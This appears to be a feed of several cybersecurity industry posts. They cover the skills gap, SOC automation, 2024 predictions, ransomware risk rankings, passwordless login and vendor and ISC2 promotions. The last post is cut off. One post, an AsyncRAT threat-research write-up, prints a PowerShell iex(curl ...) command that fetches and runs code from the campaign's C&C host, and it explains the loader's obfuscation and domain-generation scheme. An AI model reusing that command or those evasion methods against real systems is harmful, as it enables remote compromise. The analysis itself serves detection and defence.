Author: cyberinsiders

[By Irfan Shakeel, Vice President of Training and Certification Services at OPSWAT]

Addressing the cybersecurity skills gap stands out as a paramount challenge in fortifying companies’ cyber resilience today. Especially given that the remedy is neither swift nor straightforward. Transforming the educational system to align with the modern requirements of cybersecurity professionals or retraining existing technical talent for cybersecurity roles entails a prolonged collaborative effort between the private and public sectors. Nevertheless, organisations can proactively navigate the cyber skills gap by prioritising initiatives centred on retraining and maximising the potential of existing cybersecurity talent.

The cyber skills gap in the critical infrastructure sector

The cybersecurity skills gap is a persistent issue because of a constantly growing skills demand. In the UK over the past year, cybersecurity job postings went up by 30%, according to the National Cyber Security Centre (NCSC). Yet to meet this growing demand, the UK’s cybersecurity labour force would need an additional 11,200 employees.

This challenge becomes more acute when you drill down into the need for sector-specific cybersecurity skills. Take, for instance, the safeguarding of cyber-physical systems, which are integral to the digitalisation of the critical infrastructure (CI) sector. This necessitates a distinct skill set compared to securing the digital environment of an enterprise.

However, most cybersecurity training and information available online addresses IT security rather than operational technology (OT) security. Advancing cybersecurity skills for CI is imperative because compromises in cyber-physical systems can be detrimental to public safety and national security. This means CI organisations must focus their attention on empowering their current talent.

Fostering security-driven culture

From the shortage of experts in critical areas such as threat analysis, penetration testing, and AI, to the broader issues of workforce diversity, the problems contributing to the cyber skills gap are complex and evolving. That said, Verizon’s report unveiled that 74% of data breaches resulted from human errors.

Organisation-wide security awareness and a culture that promotes security practices limit human errors and alleviate the workload of cybersecurity employees. A good security culture encourages employees to identify suspicious items such as emails or activity and immediately flag them to relevant teams. This behaviour stops attacks before they can travel through a company’s environment. A security culture can be implemented by driving employee awareness of best practices and continuously measuring the impact of internal initiatives.

Leveraging AI in cybersecurity training

There is a significant opportunity to leverage AI for enhanced cybersecurity training. Through AI, organisations can personalise their training programmes to the learning styles and knowledge levels of individual users. AI-powered chatbots can act as personal coaches to make training more engaging. Stimulating conversation throughout the learning process can help users retain knowledge more effectively.

AI can also be used to create attack scenarios to help analysts understand how to detect and respond to modern threats effectively. This technique can also be employed by non-technical employees. For example, Language Learning Models (LLM) can be used to simulate phishing attacks helping employees better recognize potential threats.

Providing hands-on, in-person training

Providing hands-on training experience is essential to gain a deep understanding of security products and practices and how to apply them in real-life scenarios.

Although the Covid-19 pandemic established the habit of remote training, when it comes to developing new skills, it is important to maintain personal interactions on a frequent basis. This allows for asking questions in real time and learning from peers. Providing immersive and customised training, cybersecurity skills bootcamps enhance effective knowledge exchange. For example, OPSWAT recently launched the OPSWAT Academy Bootcamp, a global in-person training programme.

Recruiting from non-cybersecurity backgrounds

Organisations should also be open to recruiting cybersecurity professionals that may not have a traditional background. More than half of hiring managers (59%) surveyed in research by ISC2 and OPSWAT saw an increase in job applicants from technically experienced people with no prior cybersecurity experience. Professionals who may not have prior cybersecurity experience can instead offer a diverse technical background that sets them up for a successful cybersecurity career.

As organisations continue to grapple with the cyber skill gap, it is important they recognise there are initiatives and strategies that can be readily implemented to empower cybersecurity employees and build cyber resilience. This is especially important in the CI sector, where the implications of skill shortages are more pressing.

The post Navigating the Cybersecurity Skills Gap in Critical Infrastructure appeared first on Cybersecurity Insiders.

[By Michael Mumcuoglu, CEO and Co-Founder, CardinalOps]

It is worth remembering; cybersecurity professionals inherently win, only when attackers lose. Although it may feel like a victory, we don’t win when we merely maintain operations or even when we put processes in place and the processes are followed perfectly.

Attackers are constantly thinking of new ways to break into environments and avoid detection. Defending against yesterday’s attacks is important and it will undoubtably make an organization safer, but because it is so challenging to effectively get the right processes followed, it can easily become our only focus. So how do we achieve this goal? One key element is that our SOC teams must evolve. 

What is compelling us to evolve?

The global annual cost of cybercrime is predicted to reach $9.5 trillion USD in 2024, according to Cybersecurity Ventures. We are consistently reminded that adversaries behind cyber espionage and breaches are evolving, but there are also internal pressures that are forcing us to adapt.

Let’s look at the top three:

#1 Expanding attack surfaces

The proliferation of data and its protection across an increasing number of environments is a necessity as businesses and organizations are empowered by technological advances and it will only continue to accelerate in the years to come. Mass digitalization of identities, data lakes, as well as cloud and edge computing have each contributed to the exponential expansion of the attack surface.

#2 A shortage of well-trained security talent

Among the most critical concerns in the cybersecurity community is the apparent scarcity of a workforce with the requisite skills and training to keep pace with the expanding attack surface. According to recent research from ISC2, the global industry could benefit from over 3 million additional cybersecurity professionals. The natural growth of IT infrastructure and digital commerce are among the drivers of increased demand for cybersecurity jobs and have consequently broadened the threat landscape while incentivizing cybercriminals.

#3 Excessive alerts from an overwhelming number of tools

A simple – and popular – solution to the security talent shortage has seen cybersecurity providers increasingly implementing automated tools in SOC operations. On a fundamental level, this allows for traditionally monotonous tasks to be maintained while freeing our teams to focus manual efforts on cognitive decision-making. However, these automated tools are relaying a never-ending stream of alerts, some which are false positives, some difficult to identify and successfully triage and others simply informative. The vast quantities of information relayed by automated tools therefore bring SOC teams their fair share of pros and cons.

Ultimately, the modern SOC requires a solid procedural foundation, but also a new set of processes that rely on human innovation.

Striking a balance between human creativity and automation

Examining the strengths and weaknesses of manual vs automated operations results in a conundrum. Is it more effective and efficient to utilize the consistency delivered by automated processes? Or is this consistency sacrificing the advantages of innovation that organically stems from human creativity?

For SOCs, discernment may be found along a continuum. On one side, alert triage as well as reporting and metrics benefit significantly from the consistency of automation, while quality threat modeling and hunting are rewarded with the creativity of human innovation.

Automated and cloud-enabled services have allowed organizations to sift through data at unprecedented volumes, and with proper investment can ensure that SOCs are optimizing their continuous management of detection rules.

Threat hunting often requires “outside of the box” thinking to anticipate and identify potential probes or attacks on cyber assets. This integral role derives benefit from an injection of creativity from experienced cybersecurity professionals. These professionals must be skilled and focused while most importantly, being empowered to conduct threat modelling and hunting without secondary and tertiary responsibilities.

Injecting human creativity into your SOC is a benefit to the human team as well as to the automated operations. This can result in an engaged workforce that is far less prone to being overwhelmed or experiencing burnout. Striking this balance between each set of strengths while remaining cognizant of shortcomings is critical to deploying a consummate SOC.

Utilizing Proactive Threat Intelligence

Presently, SOC teams are fully aware that threat intelligence operations and management are well worth the time and effort. The goal for a superior SOC should be to take advantage of proactivity that drives the creating and tuning of unique security controls. Every organization has different “crown jewel” assets worth defending, and consistently analyzing the potential opportunities for adversaries to exploit fortifications in place is a fundamental tactic to establish security.

The MITRE ATT&CK framework is a fine example of how SOC teams can evolve with a proactive, informed approach to threat-defense. Since its creation nearly a decade ago, the framework has benefitted teams previously using threat intelligence in a reactive mode to dynamically drive the creation and fine-tuning of security controls.

The framework operates with very precise controls, which provides more in-depth recommendations to strengthen and tighten up specific rules. This allows SOC teams to significantly reduce erroneous alerts and focus their time and energy on the alerts stemming from specialized rules meant to protect their organization’s specialized assets.

The Future of the SOC

While the hybrid model of SOCs and the workforce behind them may require evolution, our understanding needn’t follow suit. As defined by Gartner,

“A security operations center provides centralized and consolidated cybersecurity incident prevention, detection, and response capabilities.” 

SOC modernization extends far beyond technology alone, providing organizations with an opportunity to reassess skills and roles and support a distributed workforce – while incorporating human creativity and innovation as a strategic force multiplier.

The post SOC Evolution Is About More Than Automation appeared first on Cybersecurity Insiders.

[By Dominik Samociuk, PhD, Head of Security at Future Processing]

When more than 6 million articles of ancestry and genetic data were breached from 23 and Me’s secure database, companies were forced to confront and evaluate their own cybersecurity practices and data management. With approximately 2.39 million instances of cybercrime experienced across UK businesses last year, the time to act is now.

If even the most secure and unsuspecting businesses aren’t protected, then every business should consider themselves, and operate as a target. As we roll into 2024, it is unlikely there will be a reduction in cases like these. It is expected there will be an uptick in the methods and levels of sophistication employed by hackers to obtain sensitive data – something that continues to increase as a high-ticket commodity.

In the next two years, it is predicted that the cost of cyber damage will grow by 15% yearly, reaching a peak of $10.5 trillion in 2025. We won’t be saying goodbye to ransomware in 2024, but rather saying hello to an evolved, automated, adaptable, and more intelligent form of it. But what else is expected to take the security industry by storm in 2024?

Offensive vs. Defensive Use of AI in Cybersecurity

Cybersecurity is a symbiotic cycle for companies. From attack to defence, an organisation’s security experts must be constantly defensive against malicious attacks. In 2024, there will be a rise in the use of Generative AI with an alarming 70% of workers using ChatGPT not making their employers aware – opening the door for significant security issues, especially for outsourced tasks like coding. And while its uses are groundbreaking, Gen AI’s misuses, especially when it comes to cybersecurity, are cause for concern.

Cybersecurity breaches will come from more sophisticated sources this year. As artificial intelligence (AI) continues to surpass development expectations, systems that can analyse and replicate humans are now being employed. With platforms like LOVO AI, and Deepgram making their way into mainstream use – often for hoax or ruse purposes – sinister uses of these platforms are being employed by cybercriminals to trick unsuspecting victims into disclosing sensitive network information from their business or place of work.

Cybercriminals target the weakest part of any security operation – the people – by encouraging them to divulge personal and sensitive information that might be used to breach internal cybersecurity. Further, Generative AI platforms like ChatGPT can  be used to automate the production of malicious code introduced internally or externally to the network. On the other hand, AI is being used to strengthen cybersecurity in unlikely ways. Emulating a cinematic cyber-future, AI can be used for the detection of malware and abnormal system/ or user activity to alert human operators. It can then equip staff with the tools and resources needed to respond in these instances.

Fatally, like any revolutionary platform, AI produces hazards and opportunities for misuse and exploitation. Seeing a rise in alarming cases of abuse, cybersecurity experts must consider the effect these might have before moving forward with an adaptable strategy for the year.

Data Privacy, Passkeys, and Targeting Small Businesses

Cybercriminals using their expertise to target small businesses is expected to increase in 2024. By nature, small businesses are unlikely to operate at a level able to employ the resources needed to combat consistent cybersecurity threats that larger organisations face on a daily basis. Therefore, with areas of cybersecurity unaccounted for, cybercriminals are likely to increasingly exploit vulnerabilities within small business networks.

They may also exploit the embarrassment felt by small business owners on occasions like these. If their data is being held for ransom, a small business owner, without the legal resources needed to fight (or tidy up) a data breach is more likely to give in to the demands of an attacker to save face, often setting them back thousands of pounds. Regular custom, loyalty, trust, and reputation makes or breaks a small business. Even the smallest data breaches can, in one fell swoop, lay waste to all of these.

Unlikely to have dedicated cybersecurity teams in place, a small business will often employ less secure and inexpensive data management solutions – making them prime targets. Contrary to expectations, in 2024, we will not say goodbye to the employment of ransomware. In fact, these tools are likely to become more common for larger, well-insured companies due to gold-rush on data harvesting.

Additionally, changing passwords will become a thing of the past. With companies like Apple beta-testing passkeys in consumer devices and even Google describing them as ‘the beginning of the end of the password’, businesses will no doubt begin to adopt this more secure technology, stored on local devices, for any systems that hold sensitive data. Using passwordless forms of identification mitigates issues associated with cyber criminals’ common method of exploiting personal information for unauthorised access.

Generative AI’s Impact on Information Warfare and Elections

In 2024, more than sixty countries will see an election take place, and as politics barrel towards all-out war in many, it is more important than ever to safeguard cybersecurity to account for a tighter grip on fact-checked information and official government communications. It is likely that we will see a steep rise in Generative AI supported propaganda on social media.

In 2016, amidst the heat of a combative and unfriendly US Presidential election, republican candidate Donald Trump popularised the term ‘Fake News’, which eight years later continues to plague realms of the internet in relation to ongoing global events. It was estimated that 25% of tweets sampled during this time, related to the election, contained links to intentionally misleading or false news stories in an attempt to further a viewpoint’s popularity. Online trust comes hand-in-hand with security, without one the other cannot exist.

While in 2016, the contemporary use of AI was extremely limited in today’s terms, what becomes of striking concern is the access members of the public have to platforms where, at will, they can legitimise a controversial viewpoint, or ‘fake news’ by generating video or audio clips of political figures, or quotes and news articles with a simple request. The ability to generate convincing text and media can significantly influence public opinion and sway electoral processes, destabilising a country’s internal and external cybersecurity.

Of greatest concern is the unsuspecting public’s inability to identify news generated by AI. Cornell University found that people were tricked into finding new false articles generated by AI credible over two-thirds of the time. Further studies found that humans were unable to identify articles written by ChatGPT beyond a level of random chance. As Generative AI’s sophistication increases, it will become ever more difficult to identify what information is genuine and safeguard online security. This is critical as Generative AI can now be used as ammunition in information warfare through the spread of hateful, controversial, and false propaganda during election periods.

In conclusion, 2024, like 2023, will see a great shift in focus toward internal security. A network is at its most vulnerable when the people who run it aren’t aligned in their strategies and values. Advanced technologies, like AI and ransomware, will continue to be a rising issue for the industry, and not only destabilise networks externally, but internally, too, as employees are unaware of the effects using such platforms might have.

The post Securing The Future: Cybersecurity Predictions for 2024 appeared first on Cybersecurity Insiders.

[By Fernando Martinez, Security Researcher, AT&T Alien Labs]

Research from AT&T Alien Labs has identified a campaign to deliver AsyncRAT onto unsuspecting victim systems. For at least 11 months, this threat actor has been working on delivering the Remote Access Trojan (RAT) through an initial JavaScript file, embedded in a phishing page. After more than 300 samples and over 100 domains later, the threat actor is persistent in their intentions.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool released in 2019 and is still available in Github. As with any remote access tool, it can be leveraged as a Remote Access Trojan, especially in this case where it is free to access and use. For that reason, it is one of the most commonly used RATs; its characteristic elements include keylogging, exfiltration techniques, and/or initial access staging for final payload delivery.

Since it was initially released, this RAT has shown up in several campaigns with numerous alterations due to its open-sourced nature, even used by the APT Earth Berberoka as reported by TrendMicro.

In early September 2023, AT&T Alien Labs observed a spike in phishing emails, targeting specific individuals in certain companies. The gif attachment led to an svg file, which also led to a download of a highly obfuscated JavaScript file, followed by other obfuscated PowerShell scripts and a final execution of an AsyncRAT client. This peculiarity was also reported by some users in X (formerly Twitter), like reecDeep and Igal Lytzki. Certain patterns in the code allowed us to pivot and look for more samples in this campaign, resulting in samples going back to February 2023.

How it works

The modus operandi of the loader involves several stages which are further obfuscated by a Command and Control (C&C) server checking if the victim could be a sandbox prior to deploying the main AsyncRAT payload. In particular, when the C&C server doesn’t rely on the parameters sent, usually after stage 2, or when it is not expecting requests on a particular domain at that time, the C&C redirects to a benign page.

During the whole campaign, JavaScript files have been delivered to targeted victims through malicious phishing web pages. These files, despite clearly being a script, contain long strings that are commented out, with texts composed of randomly positioned words, with ‘Melville’, ‘church’, ‘chapter’ and ‘scottish’ being the most repeated words.

This script is highly obfuscated, with several functions to move around the detectable commands/strings, and with the URL to the C&C being encoded in the form of decimal values. In order to decrypt the URL, the script subtracts a constant from the value and converts the number into an ASCII (data encoding) character. For example, the following array of numbers (102 131 138 138 141 62 117 141 144 138 130 63), when subtracted by 30 and converted to ASCII, corresponds to the string ‘Hello World!’

On top of modifying the C&C and URL every so often, the threat actor tries to generate a completely new version of the loader for each victim. The new files carry new randomized variable names, or a new constant subtracted to get the ASCII representation of the URL, which makes detection techniques difficult to perform consistently.

After a GET request, the C&C sends a script over HTTP. This script contains base64 code, and the necessary functions to decode it. It is then “exclusively or’ed” (XOR’ed) against a hardcoded key in the script, unpacked with Gunzip, and copied to memory to execute the payload as fileless in PowerShell. Once again, all the code will have variables with long randomized strings, commands that are ciphered and need to be converted to ASCII, as well as functions to evade endpoint detection and response (EDR), static detections, and analysis by researchers.

After the decoding, decrypting and decompressing the code, the ending script can be summarized in the command ‘iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”)’ where ‘$env:computername’ is the victim’s hostname. The second variable ‘$wiqnfex’ is a number of around 12 digits representing a value for the probability that the infected machine is a Virtual Machine or Sandbox.

If the C&C considers the victim could be a VM or Sandbox, it returns a decoy sample attempting to look like AsyncRAT. However, when the sample is decompiled, it is named “DecoyClient”, contains swear words in Russian or “LOL” as variable names, in an attempt to mock researchers.

Understanding AsyncRAT’s Network Characteristics 

The AsyncRAT code is constantly changing, heavily obfuscated and randomized, making it hard to detect. However, that is not the case for the network infrastructure. Based on our research, most domain structures associated with AsyncRAT share a few common characteristics:

  • Top Level Domain (TLD): top
  • 8 random alphanumeric characters
  • Registrant organization: ‘Nicenic.net, Inc’ (the registrar)
  • Country code South Africa (ZA)
  • Created a few days before its use

When researching domains with similar uncommon characteristics (and when the Anti-Sandbox analysis is passed), a new set of domains appears. These samples had a script to calculate the domain based on the current date. This allows the samples to automatically change the C&C domain with time and evade being blocked if the code is not properly reviewed.

The Domain Generation Algorithm (DGA) generates a seed using the day of the year and modifies it. Part of these modifications ensure that a new domain is populated every seven days, with a new domain purposely generated every Sunday. Afterward, this seed is used to pick 15 letters from ‘a’ to ‘n’ to generate the domain. The other variables in the seed (i.e. 2024 and 6542) — or the characters used to create the domain — change in some of the scripts to generate a different pattern of domains.

On top of the matching characteristics of the registrant, the Autonomous System Numbers (ASN) also carry valuable data. The domains from the first group that were hardcoded within the samples our team observed were all hosted on BitLaunch, while the DGA domains were hosted on DigitalOcean.

DigitalOcean is a very popular host provider that requires no introduction. BitLaunch, on the other hand, is not as known among common users. This ASN with identifier 399629 is known for allowing payments in cryptocurrencies like: Bitcoin, Ethereum or Litecoin. This kind of offering is not malicious by itself, however, the type of user this model attracts includes cybercriminals, who primarily operate with crypto, and can leverage the anonymity of using certain cryptocurrencies. Additionally, BitLaunch can be used as a pay bridge for servers in DigitalOcean, Vultr or linode hosts. The cheapest option is to host with BitLaunch, but the alternative allows users to pay in crypto and get hosted in a more reliable ASN.

Going back to the DGA domains that were hosted in DigitalOcean, when looking at the scanning activity generated by OTX on the DGA domains, it shows a default webpage with the message ‘Welcome to the BitLaunch LEMP app. Log in to your server to configure your LEMP installation.’ This might be an indication that these domains are hosted in DigitalOcean but paid for through BitLaunch.

Overall, the described campaign shows how determined the threat actors are to infect their victims and go unnoticed, with hundreds of different samples during 2023. Additionally, the effort to obfuscate the samples and constantly make modifications to them demonstrates how the threat actors value discretion. However, this blog is living proof that studying the actors’ activity through the year allows us to identify them when they come back with any payload with a wide range of patterns tracked by AT&T Alien Labs.

The registration of domains and subsequent AsyncRAT samples are still being observed at the time of writing this article.

The post AsyncRAT Loader Delivers Malware via JavaScript appeared first on Cybersecurity Insiders.

Scott Sayce, Global Head of Cyber at Allianz Commercial

The newly released Allianz Risk Barometer revealed that Cyber incidents such as ransomware attacks, data breaches, and IT disruptions are the biggest worry for companies globally, as well as in the United States,  in 2024. The 13th annual business risk ranking incorporates the views of 3,069 risk management experts in 92 countries and territories including CEOs, risk managers, brokers and insurance experts.

Following two years of high but stable loss activity, 2023 saw a worrying resurgence in ransomware and extortion losses, as the cyber threat landscape continues to evolve. Hackers are increasingly targeting IT and physical supply chains, launching mass cyber-attacks, and finding new ways to extort money from businesses, large and small. It’s little wonder that companies rank cyber risk as their top concern (36% of responses – 5% points ahead of the second top risk) and, for the first time, across all company sizes, large (>US$500mn annual revenue), mid-size ($100mn+ to $500mn), and smaller  <$100mn), as well.

It is the cause of business interruption that companies fear most, while cyber security resilience ranks as firms’ most concerning environmental, social, and governance (ESG) challenge. It is also the top company concern across a wide range of industries, including consumer goods, financial services, healthcare, and telecommunications, to name just a few.

Ransomware on the rise

By the start of the next decade, ransomware activity alone is projected to cost its victims $265bn annually. Activity surged by 50% year-on-year during the first half of 2023 with so-called Ransomware-as-a-Service (RaaS) kits, where prices start from as little as $40, a key driver. Gangs are also carrying out more attacks faster, with the average number of days taken to execute one falling from around 60 days in 2019 to four.

Most ransomware attacks now involve the theft of personal or sensitive commercial data for the purpose of extortion, increasing the cost and complexity of incidents, as well as bringing greater potential for reputational damage. Allianz Commercial’s analysis of large cyber losses (€1mn+) in recent years shows that the number of cases in which data is exfiltrated is increasing – doubling from 40% in 2019 to almost 80% in 2022, with 2023 activity tracking even higher.

The power of AI (to accelerate cyber-attacks)

AI adoption brings numerous opportunities and benefits, but also risk. Threat actors are already using AI-powered language models like ChatGPT to write code. Generative AI can help less proficient threat actors create new strains and variations of existing ransomware, potentially increasing the number of attacks they can execute. An increased utilization of AI by malicious actors in the future is to be expected, necessitating even stronger cyber security measures.

Voice simulation software has already become a powerful addition to the cyber criminal’s arsenal. Meanwhile, deepfake video technology designed and sold for phishing frauds can also now be found online, for prices as low as $20 per minute.

Mobile devices expose data

Lax security and the mixing of personal and corporate data on mobile devices, including smartphones, tablets, and laptops, is an attractive combination for cyber criminals. Allianz Commercial has seen a growing number of incidents caused by poor cyber security around mobile devices. During the pandemic many organizations enabled new ways of accessing their corporate network via private devices, without the need for multi-factor authentication (MFA). This also resulted in a number of successful cyberattacks and large insurance claims.

The roll-out of 5G technology is also an area of potential concern if not managed appropriately, given it will power even more connected devices. However, many IoT devices do not have a good record when it comes to cyber security, are easily discoverable, and will not have MFA mechanisms, which, together with the addition of AI, presents a serious cyber threat.

Security skills shortage a factor in incidents

The current global cyber security workforce gap stands at more than four million people, with demand growing twice as fast as supply. Gartner predicts that a lack of talent or human failure will be responsible for over half of significant cyber incidents by 2025. Shortage of skilled workforce ranks joint #5 in the top concerns of the media sector and is a top 10 risk in technology in the Allianz Risk Barometer.

It is difficult to hire good cyber security engineers, and without skilled personnel, it is more difficult to predict and prevent incidents, which could mean more losses in the future. It also impacts the cost of an incident. Organizations with a high level of security skills shortage had a $5.36mn average data breach cost, around 20% higher than the actual average cost, according to the IBM Cost of a Data Breach Report 2023.

Early detection is key

Preventing a cyber-attack is therefore becoming harder, and the stakes are higher. As a result, early detection and response capabilities and tools are becoming ever more important. Investment in detection backed by AI should also help to catch more incidents earlier. If companies do not have effective early detection tools this can lead to longer unplanned downtime, increased costs and have a greater impact on customers, revenue and reputation.  The lion’s share of IT security budgets is currently spent on prevention with around 35% directed to detection and response.

SMEs the increasing sweet spot

For smaller and mid-size companies (SMEs), the cyber risk threat has intensified because of their growing reliance on outsourcing for services, including managed IT and cyber security providers, given these firms lack the financial resources and in-house expertise of larger organizations.

As larger companies have ramped up their cyber protection, criminals have targeted smaller firms. SMEs are less able to withstand the business interruption consequences of a cyber-attack. If a small company with poor controls or inadequate risk management suffers a significant incident, there is a chance it might not survive.

Businesses can take a proactive approach to tackling cyber threats by ensuring their cyber security strategy identifies their most crucial information system assets. Then, they should deploy appropriate detection and monitoring software, both at the network perimeter and on endpoints, often involving collaboration with cyber-security service partners, to uncover and nullify threats attempting to gain network access.

To view the 2024 Allianz Risk Barometer, please visit: Allianz Risk Barometer

The post Cybersecurity Tops 2024 Global Business Risks appeared first on Cybersecurity Insiders.

In an era where online threats no longer discriminate by business size, Control D, powered by Windscribe VPN‘s robust security expertise, announced today the launch of ‘Control D for Organizations‘. This modern DNS service democratizes cybersecurity, making it accessible to businesses of every size, from budding start-ups to late stage SMBs and MSPs.

Leveraging the strength of the world’s largest physical VPN network, Control D is bringing unmatched expertise in navigating cybersecurity challenges and global surveillance into the hands of businesses that traditionally lacked these advanced protections.

Control D for Organizations is geared at companies, schools, and NGOs of all sizes offering simplicity for smaller teams and highly specific and advanced controls for larger organizations. Control D is packed with an arsenal of tools designed to secure and empower diverse teams:

1. Malware Blocking: Protecting business continuity against malicious threats with state-of-the-art detection techniques, all built in-house. Protect individual devices or entire networks in just a few minutes.

2. **Multi-Tenancy: Addresses the complexity of managing access and filtering policies across different departments, subsidiaries, or customer accounts within a large enterprise or service provider setting.

3. Modern Protocols: Security cannot be assured using standard DNS protocols. That’s why Control D supports all modern (and encrypted) protocols like DNS-over-HTTPS/3 and DNS-over-TLS.

4. Custom Filtering: Highly granular web filters provide power users with ultimate control, while more general curated lists allow DNS security newcomers to gain maximum security benefits with minimal effort.

5. Actionable Insights: Detailed network activity analytics empowers businesses to improve their security posture and make strategic decisions.

Control D for Organizations is more than a security tool—it’s a declaration that first-rate cybersecurity is no longer a luxury. It embodies a new era where organizations, irrespective of their size or financial prowess, can confidently protect their operations and data.

‘Control D for Organizations ‘, Empowering Every Business with Advanced Cybersecurity

Control D is a pioneer in software security, devoted to offering next-level, user-centric solutions. Backed by the years of security expertise of Windscribe VPN which protects over 68 million people, Control D leverages the largest physical VPN network and one of the fastest anycast DNS networks to deliver unparalleled security and freedom from surveillance on a global scale.

Join the DNS security revolution and equip your business with Control D. Visit controld.com for more information and take your first step towards comprehensive digital protection. Additional assistance for onboarding channel partners available. Free no-payment-details required trial is available.

Media Contact Information:

For further details, please contact Yegor Sak at business@controld.com or our channel partner lead Joe Jaghab at Joe@controld.com

The post ‘Control D for Organizations’ Launched – Democratizing Cybersecurity for Organizations of All Sizes appeared first on Cybersecurity Insiders.

The growth of our digital footprints has resulted in concerns about online identity security. Traditional passwords systems have become outdated, creating fertile ground for increasingly sophisticated cyber threats. On this Change Your Password Day, we should not only change our passwords but also investigate the very essence of digital security.

Just think of how annoying it is to see ‘Login Failed.’ It is a message many people have seen too often and shows the system does not meet the needs for modern security. People not wanting too many passwords is the cause of some of the biggest security breaches to date, and change must happen.

Protecting users in the present

When looking at protecting themselves, organisations need to ensure they are acting in the here and now. Adam Marrè from Arctic Wolf who serves as Chief Information Security Officer highlights that while “passwords are the lifeblood of our online persona; we need to take them seriously to protect ourselves from the threat of cybercrime.” He highly recommends organisations have strong password management practices, including regular updates to passwords and ensuring they “don’t consist of words or phrases that can be associated directly with you, your interests or family.”

At the same time Marrè observes that, while people should use unique passwords for every account, “we must turn on two-factor authentication if it’s available.” He adds, “with so many passwords to keep track of, password discipline is difficult.”

David Warburton, Director, F5 Labs agrees with this advice, but with the caveat that, “while multi-factor authentication is still strongly recommended wherever possible, the vast number of tricks attackers have at their disposal means it is far from the unbreakable security control it was once was.” He states businesses need, “solutions that directly disrupt attacker ROI and that can curate and analyse network, device, and environmental telemetry signals across data centres, clouds, and architectures. By modelling threat intelligence across similar attack profiles and risk surfaces, affected organisations can autonomously deploy appropriate countermeasures.”

Our present security practices conceal more danger than meets the eye according to Andy Thompson, Offensive Research Evangelist at CyberArk Labs. “Simply putting strong passwords in place is no longer good enough. In fact, no matter how strong your password is, if a threat actor gets a hold of a cookie, none of it matters,” he explains. “Instead, we need a mechanism that mandates users to frequently change their credentials. And, each time, this mechanism must require strong, unique passwords, not iterative Password1, Password2 changes.”

Paul Anderson, VP UK & Ireland at Fortinet, concludes, “no single organisation can combat cybercrime alone, even with the most effective technologies and skilled security professionals in place. Having strong passwords is a way to prevent threats from entering networks, while regularly changing passwords to ensure data is protected demonstrates how everyone in a business has a part to play to maintain security.”

The future of passwordless 

While protecting ourselves in the here and now is vital, organisations also need to look to the future. But what does that future look like? According to Ping Identity’s General Manager, EMEA, Paul Inglis, with backing from industry giants like Google and Amazon, “the momentum behind passwordless authentication is undeniable and many enterprise organisations are already on this digital transformation journey.”

Frederik Mennes, Director Product Management & Business Strategy at OneSpan, adds, “Upholding the integrity of your digital identity should be a top priority. This starts with passwordless protection which emerges as a viable alternative for securing critical systems that store sensitive data, providing defence against evolving threats by eliminating vulnerabilities associated with traditional passwords.”

A beacon of hope, according to Inglis, passwordless authentication is, “a paradigm shift to enhance security and user convenience significantly.” With Ping Identity research revealing that 59% of UK consumers would switch to a different brand or service that offered them passwordless as a means of logging in. According to Inglis, “this change will fundamentally reduce fraud and give consumers more security to freely navigate the digital world without fear of scams.”

The transition to passwordless then, is not just about throwing away passwords; rather it is a transformative step towards secure, open-ended and low-friction digital identity.

Final thoughts

Digital security has reached a tipping point this Change Your Password Day. Passwordless authentication provides a sneak preview on what secure future digital identities will look like and, although the adoption of passwordless technologies is still in its infancy, it’s indicative of changing perceptions about what it means to be safe in an increasingly web-based environment.

In conclusion, Change Your Password Day must be more than a cursory nod to security – it must be a clarion call for systemic change. As we await further contributions from industry experts, let us pivot towards embracing these emerging technologies, all the while maintaining vigilant, robust security practices. This is not just a step but a leap towards a future where our digital lives are as protected as they are connected – a future where our security is not just reactive, but proactive, comprehensive, and deeply integrated into the fabric of our digital existence.

The post Change Your Password Day: Navigating the Shift Towards a Passwordless Future appeared first on Cybersecurity Insiders.

With the current threats to cyber stability around the world, there’s never been a greater urgency for cybersecurity professionals than now. Organizations are investing more time, money and talent to detecting and mitigating cyberattacks. The result is a boom in demand for skilled cybersecurity professionals.

Entry-level cybersecurity roles require foundational knowledge and skills. They serve as stepping stones for professional growth. But how do you get started in the field? ISC2, creator of the top advanced cybersecurity certification, the CISSP®, recommends these specific steps.

  1. Become an ISC2 Candidate. Begin your journey by joining ISC2, the world’s leading cybersecurity professional organization, more than 500,000 members, associates and candidates strong. As part of their One Million Certified in Cybersecurity pledge to help close the workforce gap, you’ll be able to access free Official ISC2 Online Self-Paced Training for Certified in Cybersecurity entry-level certification and a free exam. Candidates can also tap a full range of benefits, including 20% off online training and up to 50% off textbooks. Sign up now to get your first year free.
  2. Start your journey toward CC certification. Certified in Cybersecurity (CC) certification from ISC2 creates a clear pathway to an exciting and rewarding career. The certification breaks down traditional barriers to entry, enabling you to build confidence and begin your first cybersecurity role ready for what’s next. No work experience in cybersecurity or formal educational diploma/degree is required.

CC is a great fit for IT professionals, career-changers; college students or recent graduates; and executives seeking foundational knowledge in cybersecurity.

  1. Keep learning. Cybersecurity never stands still. It’s a constantly evolving field that requires continuing education to stay in front cyberthreats and on top of trends. Professionals can choose from a variety of flexible learning options, including:

ISC2 Certificates turn a laser focus on specific subject matters. And with courseware created on the hottest topics by cybersecurity’s most respected certifying body, you’re assured the most current and relevant content. Choose from online instructor-led or self-paced education with content created by industry experts:

Online Instructor-Led*
• Prerecorded lessons led by an ISC2 Authorized Instructor
• Instruction that complements self-paced content
• Digital badges upon passing certificate assessments

Online Self-Paced
• Online learning at your own pace
• Videos available for download on demand
• Digital badges upon passing certificate assessments

Current ISC2 Certificate areas of focus include cloud security, risk management, CISO leadership, healthcare, security engineering, and security administration and operations. Additional certificates coming soon.

ISC2 Entry-level Cybersecurity Skill-Builders will help you acquire valuable skills as you pursue a career in cybersecurity. Grow what you know with short-format learning designed to fit your busy schedule.

A career in cybersecurity provides the opportunity to make a significant impact on the world. Qualified professionals are indispensable to organizations, safeguarding their information and systems. See yourself in cybersecurity and get started today. Learn More.

More questions about CC? Get Answers in the Ultimate Guide, everything you need to know about CC. Download Now.

*Online instructor-led only available for select certificates.

The post Thinking about a Career in Cybersecurity? Follow this Path appeared first on Cybersecurity Insiders.

[By Dan Benjamin, CEO and Co-Founder of Dig Security (acquired by Palo Alto Networks)]

Large Language Models (LLMs) and generative AI were undoubtedly the biggest tech story of 2023. While the ever-changing nature of AI makes it difficult to predict the future, we can point to an emerging trend: enterprises are exploring use cases that involve ‘feeding’ the company’s own data to a large language model, rather than relying on the general-purpose chatbots provided by the likes of OpenAI and Google.

